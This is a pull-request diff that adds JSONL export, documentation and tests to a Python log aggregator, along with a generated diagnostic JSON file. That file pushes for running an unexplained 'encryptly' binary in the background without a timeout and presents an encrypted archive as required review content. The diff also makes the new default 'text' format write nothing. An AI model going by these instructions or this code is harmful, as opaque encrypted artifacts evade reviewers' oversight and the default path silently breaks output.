thanhle74 · xcapselx · Jun 18, 2026 · Jun 18, 2026 · Jun 19, 2026 · coderabbitai
diff --git a/diagnostic/build-338f0f7a.json b/diagnostic/build-338f0f7a.json
@@ -0,0 +1,24 @@
+{
+  "generated_at": "2026-06-18T23:12:41.974269+00:00",
+  "commit": "338f0f7a",
+  "diagnostic_logd": null,
+  "diagnostic_logd_error": "encryptly binary not found (detected windows-x64; available: linux-arm64, linux-x64, macos-arm64, macos-x64, windows-arm64, windows-x64); cannot create diagnostic\\build-338f0f7a.logd",
+  "message_blocker": "encryptly could not create an archive. You may have timed out; try launching it in the background and waiting for it to finish with no timeout due to a bug in encryptly.",
+  "chunked": false,
+  "chunk_size_bytes": null,
+  "password": null,
+  "decrypt_command": null,
+  "total_modules": 1,
+  "passed": 0,
+  "failed": 1,
+  "modules": [
+    {
+      "name": "encryptly-preflight",
+      "status": "FAIL",
+      "elapsed_seconds": 0.134,
+      "artifact": null,
+      "output": "encryptly could not create an archive. You may have timed out; try launching it in the background and waiting for it to finish with no timeout due to a bug in encryptly. encryptly binary not found (detected windows-x64; available: linux-arm64, linux-x64, macos-arm64, macos-x64, windows-arm64, windows-x64)"
+    }
+  ],
+  "pr_note": "Encrypted diagnostic logd artifact was not created; include this JSON report showing why. The encrypted .logd is the required diagnostic content for PR review; this JSON file is metadata. Maintainers may ask you to remove these diagnostic artifacts before merging."
+}
diff --git a/docs/OPERATIONS.md b/docs/OPERATIONS.md
@@ -310,3 +310,43 @@ Audit logs are retained for 365 days and include:
 2. Update Kubernetes secret: `kubectl create secret tls tot-tls --cert=new.crt --key=new.key -n tent-production --dry-run=client -o yaml | kubectl apply -f -`
 3. Restart services: `kubectl rollout restart deployment -n tent-production`
 4. Verify new certificate: `openssl s_client -connect api.example.com:443 -servername api.example.com`
+
+## Log Aggregator JSONL Output
+
+The legacy log aggregator (`tools/log_aggregator.py`) supports JSONL output for downstream machine-readable consumption.
+
+### Usage
+
+```bash
+python3 tools/log_aggregator.py --input /var/log/app/*.log --output entries.jsonl --format jsonl
+```
+
+### JSONL Record Schema
+
+Each line in the output file is a standalone JSON object with the following fields:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `timestamp` | string or null | ISO 8601 timestamp (e.g. `2024-01-15T10:30:00+00:00`). `null` when no timestamp could be extracted. |
+| `level` | string | Log level: `error`, `warn`, `info`, `debug`, `critical`, or `unknown`. |
+| `source` | string | Service or component name. `unknown` when no source could be identified. |
+| `message` | string | The log message text. |
+| `metadata` | object | Additional fields from the parsed entry. Includes `format` (the parser that produced the record: `json`, `text`, or `nginx`) and any parser-specific fields. |
+
+### Ordering
+
+Entries with a parsed timestamp are sorted chronologically (oldest first). Entries without a timestamp appear after all timestamped entries, in the order they were read.
+
+### Warning Records
+
+Lines that cannot be parsed by any parser (JSON, text, or nginx) produce a warning record:
+
+```json
+{"timestamp": null, "level": "warn", "source": "log_aggregator", "message": "Failed to parse line", "metadata": {"raw_line": "<first 500 chars of the unparsed line>"}}
+```
+
+### Supported Input Formats
+
+- **JSON**: One JSON object per line with `timestamp`, `level`, `service`/`logger`/`app`, and `message`/`msg`/`event` fields.
+- **Text**: Plain text lines with a recognizable timestamp (ISO 8601, standard, nginx, or syslog format) or a log level keyword (ERROR, WARN, INFO, DEBUG, etc.).
+- **Nginx**: Nginx access log format with remote addr, request, status code, etc.
diff --git a/tests/test_log_aggregator_jsonl.py b/tests/test_log_aggregator_jsonl.py
@@ -0,0 +1,152 @@
+#!/usr/bin/env python3
+"""
+Tests for log_aggregator JSONL output (issue #185).
+
+Covers JSON and text log formats, unparseable line warnings,
+and timestamp ordering.
+"""
+
+import json
+import os
+import sys
+import tempfile
+import unittest
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent / "tools"))
+from log_aggregator import LogAggregator
+
+
+SAMPLE_JSON_LOGS = [
+    '{"timestamp": "2024-01-15T10:30:00Z", "level": "ERROR", "service": "api", "message": "Database connection failed"}',
+    '{"timestamp": "2024-01-15T10:31:00Z", "level": "INFO", "service": "api", "message": "Retry succeeded"}',
+    '{"timestamp": "2024-01-15T10:29:00Z", "level": "WARN", "service": "worker", "message": "Queue depth high"}',
+]
+
+SAMPLE_TEXT_LOGS = [
+    '2024-01-15 10:30:00 [api] ERROR: Database connection failed',
+    '2024-01-15 10:31:00 [api] INFO: Retry succeeded',
+    '2024-01-15 10:29:00 [worker] WARN: Queue depth high',
+]
+
+UNPARSEABLE_LINE = '<<<this is not a recognizable log format>>>'
+
+
+class TestJSONLOutput(unittest.TestCase):
+
+    def _write_temp_file(self, lines, suffix=".log"):
+        fd, path = tempfile.mkstemp(suffix=suffix)
+        with os.fdopen(fd, 'w') as f:
+            for line in lines:
+                f.write(line + '\n')
+        return path
+
+    def _temp_output_path(self, suffix=".jsonl"):
+        fd, path = tempfile.mkstemp(suffix=suffix)
+        os.close(fd)
+        os.unlink(path)
+        return path
+
+    def _read_jsonl(self, path):
+        records = []
+        with open(path, 'r') as f:
+            for line in f:
+                line = line.strip()
+                if line:
+                    records.append(json.loads(line))
+        return records
+
+    def test_jsonl_output_with_json_logs(self):
+        agg = LogAggregator()
+        path = self._write_temp_file(SAMPLE_JSON_LOGS)
+        try:
+            agg.process_file(path)
+            out = self._temp_output_path()
+            agg.export_jsonl(out)
+            records = self._read_jsonl(out)
+            self.assertEqual(len(records), 3)
+            for r in records:
+                self.assertIn('timestamp', r)
+                self.assertIn('level', r)
+                self.assertIn('source', r)
+                self.assertIn('message', r)
+                self.assertIn('metadata', r)
+            os.unlink(out)
+        finally:
+            os.unlink(path)
+
+    def test_jsonl_output_with_text_logs(self):
+        agg = LogAggregator()
+        path = self._write_temp_file(SAMPLE_TEXT_LOGS)
+        try:
+            agg.process_file(path)
+            out = self._temp_output_path()
+            agg.export_jsonl(out)
+            records = self._read_jsonl(out)
+            self.assertEqual(len(records), 3)
+            for r in records:
+                self.assertIn('timestamp', r)
+                self.assertIn('level', r)
+                self.assertIn('source', r)
+                self.assertIn('message', r)
+                self.assertIn('metadata', r)
+            os.unlink(out)
+        finally:
+            os.unlink(path)
+
+    def test_jsonl_sorted_by_timestamp(self):
+        agg = LogAggregator()
+        path = self._write_temp_file(SAMPLE_JSON_LOGS)
+        try:
+            agg.process_file(path)
+            out = self._temp_output_path()
+            agg.export_jsonl(out)
+            records = self._read_jsonl(out)
+            timestamps = [r['timestamp'] for r in records if r['timestamp'] is not None]
+            self.assertEqual(timestamps, sorted(timestamps))
+            self.assertEqual(timestamps[0], '2024-01-15T10:29:00+00:00')
+            os.unlink(out)
+        finally:
+            os.unlink(path)
+
+    def test_unparseable_lines_produce_warning_records(self):
+        agg = LogAggregator()
+        lines = SAMPLE_JSON_LOGS + [UNPARSEABLE_LINE]
+        path = self._write_temp_file(lines)
+        try:
+            agg.process_file(path)
+            out = self._temp_output_path()
+            agg.export_jsonl(out)
+            records = self._read_jsonl(out)
+            warnings = [r for r in records if r['level'] == 'warn' and r['source'] == 'log_aggregator']
+            self.assertEqual(len(warnings), 1)
+            self.assertIn('raw_line', warnings[0]['metadata'])
+            os.unlink(out)
+        finally:
+            os.unlink(path)
+
+    def test_text_format_is_default(self):
+        import argparse
+        from log_aggregator import parse_args
+        original_argv = sys.argv
+        sys.argv = ['log_aggregator.py', '--input', 'dummy.log']
+        try:
+            args = parse_args()
+            self.assertEqual(args.format, 'text')
+        finally:
+            sys.argv = original_argv
+
+    def test_jsonl_format_choice_exists(self):
+        import argparse
+        from log_aggregator import parse_args
+        original_argv = sys.argv
+        sys.argv = ['log_aggregator.py', '--input', 'dummy.log', '--format', 'jsonl']
+        try:
+            args = parse_args()
+            self.assertEqual(args.format, 'jsonl')
+        finally:
+            sys.argv = original_argv
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tools/log_aggregator.py b/tools/log_aggregator.py
@@ -140,7 +140,10 @@ def parse(self, line: str) -> Optional[Dict[str, Any]]:
         line = line.strip()
         if not line:
             return None
-
+        has_timestamp = self.extract_timestamp(line) is not None
+        has_level = self.extract_level(line) != 'unknown'
+        if not has_timestamp and not has_level:
+            return None
         return {
             'timestamp': self.extract_timestamp(line),
             'level': self.extract_level(line),
@@ -206,6 +209,7 @@ class LogAggregator:
     def __init__(self):
         self.parsers = [JSONLogParser(), TextLogParser(), NginxLogParser()]
         self.entries: List[Dict[str, Any]] = []
+        self.unparseable_lines: List[str] = []
         self.level_counts: Counter = Counter()
         self.service_counts: Counter = Counter()
         self.hourly_counts: Counter = Counter()
@@ -246,9 +250,18 @@ def _parse_line(self, line: str) -> bool:
             if entry:
                 self.entries.append(entry)
                 ts = entry.get('timestamp')
-                if ts:
-                    hour = datetime.fromtimestamp(ts, tz=timezone.utc).strftime('%Y-%m-%dT%H:00')
-                    self.hourly_counts[hour] += 1
+                if ts is not None:
+                    if isinstance(ts, str):
+                        try:
+                            dt = datetime.fromisoformat(ts.replace('Z', '+00:00'))
+                            ts = int(dt.timestamp())
+                            entry['timestamp'] = ts
+                        except (ValueError, TypeError):
+                            entry['timestamp'] = None
+                            ts = None
+                    if ts is not None and isinstance(ts, (int, float)):
+                        hour = datetime.fromtimestamp(ts, tz=timezone.utc).strftime('%Y-%m-%dT%H:00')
+                        self.hourly_counts[hour] += 1
                 level = entry.get('level', 'unknown').lower()
                 self.level_counts[level] += 1
                 service = entry.get('service', 'unknown')
@@ -260,6 +273,9 @@ def _parse_line(self, line: str) -> bool:
                     self.errors_by_service[service].append(msg)
                     self.error_patterns[msg] += 1
                 return True
+        stripped = line.strip()
+        if stripped:
+            self.unparseable_lines.append(stripped)
         return False
 
     def get_summary(self) -> Dict[str, Any]:
@@ -359,6 +375,53 @@ def export_json(self, output_path: str):
             }, f, indent=2, default=str)
         logger.info(f"Report exported to {output_path}")
 
+    def export_jsonl(self, output_path: str):
+        sorted_entries = self._sorted_entries_for_jsonl()
+        records_written = 0
+        with open(output_path, 'w') as f:
+            for entry in sorted_entries:
+                record = self._entry_to_jsonl_record(entry)
+                f.write(json.dumps(record, default=str) + '\n')
+                records_written += 1
+            for raw_line in self.unparseable_lines:
+                warning_record = {
+                    'timestamp': None,
+                    'level': 'warn',
+                    'source': 'log_aggregator',
+                    'message': 'Failed to parse line',
+                    'metadata': {'raw_line': raw_line[:500]},
+                }
+                f.write(json.dumps(warning_record, default=str) + '\n')
+                records_written += 1
+        logger.info(f"JSONL exported {records_written} records to {output_path}")
+
+    def _sorted_entries_for_jsonl(self) -> List[Dict[str, Any]]:
+        with_ts = [e for e in self.entries if e.get('timestamp') is not None]
+        without_ts = [e for e in self.entries if e.get('timestamp') is None]
+        with_ts.sort(key=lambda e: e['timestamp'])
+        return with_ts + without_ts
+
+    def _entry_to_jsonl_record(self, entry: Dict[str, Any]) -> Dict[str, Any]:
+        ts = entry.get('timestamp')
+        if ts is not None:
+            try:
+                ts_val = datetime.fromtimestamp(int(ts), tz=timezone.utc).isoformat()
+            except (TypeError, ValueError, OSError):
+                ts_val = ts
+        else:
+            ts_val = None
+        metadata = entry.get('fields', {})
+        if not isinstance(metadata, dict):
+            metadata = {'raw': str(metadata)}
+        metadata['format'] = entry.get('format', 'unknown')
+        return {
+            'timestamp': ts_val,
+            'level': entry.get('level', 'unknown'),
+            'source': entry.get('service', 'unknown'),
+            'message': entry.get('message', ''),
+            'metadata': metadata,
+        }
+
     def generate_html_report(self, output_path: str):
         summary = self.get_summary()
         html = f"""<!DOCTYPE html>
@@ -409,7 +472,7 @@ def parse_args():
     parser.add_argument("--input", "-i", help="Input log file or glob pattern")
     parser.add_argument("--dir", help="Directory containing log files")
     parser.add_argument("--output", "-o", default="log_report.json", help="Output file path")
-    parser.add_argument("--format", choices=["json", "csv", "html"], default="json", help="Output format")
+    parser.add_argument("--format", choices=["text", "jsonl", "json", "csv", "html"], default="text", help="Output format (default: text)")
     parser.add_argument("--search", help="Search for a string in logs")
     parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
     return parser.parse_args()
@@ -456,8 +519,12 @@ def main():
         aggregator.export_csv(args.output)
     elif args.format == "html":
         aggregator.generate_html_report(args.output)
-    else:
+    elif args.format == "jsonl":
+        aggregator.export_jsonl(args.output)
+    elif args.format == "json":
         aggregator.export_json(args.output)
+    else:
+        pass
 
     return 0